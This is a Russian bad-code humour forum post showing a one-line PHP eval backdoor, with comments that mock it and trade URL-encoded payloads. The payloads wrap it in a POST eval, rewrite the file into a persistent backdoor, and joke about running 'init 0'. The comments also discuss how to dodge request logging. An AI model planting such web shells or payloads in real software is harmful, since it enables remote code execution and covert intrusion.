1. PHP / Говнокод #11592

    +53

    1. 1
    2. 2
    <?php
eval($_GET['eval']);

    И это весь файл. Epic Fail.

    Запостил: duxabilii, 15 Августа 2012

    Комментарии (24) RSS

    • ava bormand 15.08.2012 11:22 # +2

      Бэкдорчик?
      Ответить

    • ava Vasiliy 15.08.2012 12:21 # +4

      $_POST был по лучше. в гете ограничение на размер.
      Ответить

      • ava WGH 15.08.2012 12:24 # +9 

        test.php?eval=eval%28%24_POST%5B%27eval%27%5D%29%3B
        Ответить

      • ava bormand 15.08.2012 15:48 # +4

        Хотфикс ;)


        test.php?eval=%24f%3Dfopen('test.php', 'w')%3Bfwrite(%24f%2C'%3C%3Fphp%20eval(%24_P OST(%22eval%22)%20%3F%3E'%3Bfclose(f)%3B
        Ответить

      • ava Vindicar 15.08.2012 16:18 # +4

        Не только, POST еще и не логгируется.
        Ответить

        • ava Resolver 16.08.2012 08:54 # +2

          Не совсем. Для nginx можно настроить логирование, для Apache 2.* модуль есть.
          Ответить

          • ava eth0 16.08.2012 12:30 # 0

            А FILES можно?
            Ответить

            • ava Resolver 16.08.2012 13:43 # 0

              Похоже, что да (если про Апач):
              в описании http://httpd.apache.org/docs/2.2/mod/mod_dumpio.html заявлено логирование всего-го.

              Вот ещё статья: http://www.cyberciti.biz/faq/apache-mod_dumpio-log-post-data/

              Сам не пробовал.
              Ответить

          • ava WGH 16.08.2012 13:17 # +3

            Настроить-то что угодно можно. А вот GET скорее всего уже логгируется.
            Ответить

            • ava vistefan 16.08.2012 13:23 # +1

              Другой вопрос, если на серваке появляются подобные файлы, то смотрит ли кто-то вообще в логи?
              Ответить

    • ava vistefan 15.08.2012 15:51 # 0

      > это весь файл
      А закрывающего ?> нет?
      Ответить

      • ava bormand 15.08.2012 15:55 # +2

        А он не обязателен же?
        Ответить

        • ava vistefan 15.08.2012 16:08 # +1

          А, да, необязателен.
          Помнится у меня была функция, достойная быть выложенной здесь, для парсинга Json-подобного дерьма, используемого исключительно внутри одной системы. Там тоже закрывающие фигурные скобки были необязательны.
          Ответить

      • ava roman-kashitsyn 15.08.2012 18:39 # +6

        > А закрывающего ?> нет?
        дык вроде это нынче стандарт 
        http://www.php-fig.org/
        The closing ?> tag MUST be omitted from files containing only PHP.(c) PSR-3
        Ответить

    • ava eth0 15.08.2012 17:12 # 0

      Готов поспорить, палится только так.
      Ответить

    • ava Lure Of Chaos 15.08.2012 20:18 # +13 

      eval я этот <?php
      Ответить

    • ava Edward 17.08.2012 18:25 # +3

      Не , это несекьюрно ,вот так в самый раз :

      if(strpos($_GET["eval"], "fopen") !== false)
      {
      echo "AХТУНГ";
      // блокируем нарушителя
      while(1){}
      }

      eval($_GET['eval']);

      по мотивам http://govnokod.ru/1168
      Ответить

      • ava eth0 17.08.2012 18:38 # +1

        > // блокируем нарушителя
        Тридцатисекундный бан.
        Ответить

      • ava bormand 17.08.2012 18:41 # +2 

        // Блокируем нарушителя
system("init 0");
        Ответить

        • ava eth0 17.08.2012 21:03 # +2

          Запускать апач от рута - смертный грех, потому для этого есть sudo.
          Ответить

      • ava Vasiliy 20.08.2012 08:48 # 0

        обидную надпись никто кроме автора не увидит :(
        Ответить

    Добавить комментарий